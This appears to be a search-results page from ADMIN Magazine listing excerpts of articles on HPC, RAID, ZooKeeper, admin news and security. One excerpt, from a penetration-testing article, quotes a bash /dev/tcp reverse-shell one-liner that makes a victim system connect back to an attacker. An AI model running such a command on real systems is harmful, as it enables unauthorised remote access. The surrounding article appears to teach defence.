Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (1348)
  • Article (337)
  • News (254)
  • Blog post (4)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 65 66 67 68 69 70 71 72 73 74 75 76 77 78 ... 195 Next »

10%
News for Admins
28.07.2025
Home »  Archive  »  2025  »  Issue 88: 5 Net...  » 
 
compatibility between releases. Learn more at OpenELA: https://openela.org/. Ultra Ethernet Consortium Releases 1.0 Specification The Ultra Ethernet Consortium (UEC) has released UEC Specification 1.0 (https ... Releases 1.0 Specification; CVE Foundation Issues Call for Support; Doudna Supercomputer in Development at NERSC; AlmaLinux OS 10 Released; CloudBees Introduces Unify DevOps Solution; Red Hat Enterprise
10%
News for Admins
25.09.2023
Home »  Archive  »  2023  »  Issue 77: Secur...  » 
 
analyzes cyberattacks and identifies various threats, impacts, and trends over a two-year period. JupyterLab 4.0 Now Available The Jupyter community has released JupyterLab 4.0, which offers faster ... ; IEEE Releases New Standard for LiFi Communications; EU Health Sector Security Risks; and JupyterLab 4.0.
10%
Gathering Data on Environment Modules
10.09.2012
Home »  HPC  »  Articles  » 
$ module load compiler/open64-5.0 where the first part of the command is the module command, the second part is the module function, and the third part is the module you are loading. To make things easier
10%
Coordinating distributed systems with ZooKeeper
07.10.2014
Home »  Archive  »  2014  »  Issue 23: 10 Ti...  » 
Lead Image © smileus, 123RF.com
of the naming, grouping, or configurations of the menagerie. Thanks to ZooKeeper [1], which is available under the Apache 2.0 license, not every cluster has to provide a synchronization service itself
10%
Introducing parity declustering RAID
28.11.2022
Home »  Archive  »  2022  »  Issue 72: OpenS...  » 
Lead Image © Author, 123RF.com
. Figure 1: A general outline of RAID levels 0, 1, and 5. Common RAID types include: RAID 0 – Disk striping. Data is written in chunks across all drives in a stripe, typically organized in a round
10%
OpenACC – Parallelizing Loops
09.01.2019
Home »  HPC  »  Articles  » 
of the loop, n , is large enough, some processing hardware can greatly speed up the computation. What happens if z(i)  depends on a previous value, as in the following: do i = 2,n    z(i) = z(i-1)*2 enddo
10%
Using loop directives to improve performance
05.02.2019
Home »  Archive  »  2019  »  Issue 49: Anato...  » 
Lead Image © orson, 123RF.com
if z(i) depends on a previous value, as in the following: do i = 2,n z(i) = z(i-1)*2 enddo As written, you can't generally parallelize the loop because of data dependency [4]. This dependency
10%
Plundering treasures with Gitrob
09.04.2019
Home »  Archive  »  2019  »  Issue 50: Bpfilter  » 
Lead Image © pip, photocase.com
Hub releases page [7]. I went with gitrob_linux_amd64_2.0.0-beta.zip, which is a little more than 6MB in size and 21MB uncompressed. After downloading the file (e.g., with wget), I checked that the binary suited
10%
Improved defense through pen testing
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image Photo by Simeon Jacobson on Unsplash
with Computer A (the victim system) receiving the following code: $ bash -I <& /dev/tcp/10.0.0.1/444 0<&1 that causes Computer A to connect to Computer B (the attacking system that receives the connection from
10%
Open Network Operating System
11.10.2016
Home »  Archive  »  2016  »  Issue 35: Persi...  » 
Lead Image © Rade Lukovic, Fotolia.com
. It is currently working on version 1.7.0 (code-named Hummingbird), which will be the eighth release of ONOS. The ONOS team includes various other participants, including service providers such as AT&T, China

« Previous 1 ... 65 66 67 68 69 70 71 72 73 74 75 76 77 78 ... 195 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2026 Linux New Media USA, LLC – Legal Notice